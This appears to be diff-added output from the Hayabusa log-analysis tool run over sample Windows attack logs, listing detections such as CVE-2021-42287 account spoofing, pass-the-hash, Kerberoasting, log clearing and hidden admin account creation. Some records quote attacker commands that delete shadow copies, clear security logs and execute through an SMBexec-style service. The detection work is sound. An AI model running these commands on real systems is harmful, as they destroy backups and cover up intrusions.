+2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx
+2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,,New Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx
+2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx
+2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
+2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
+2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.306 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx
+2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx
+2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
+2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
+2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx
+2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx
+2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
+2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
+2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
+2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
+2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
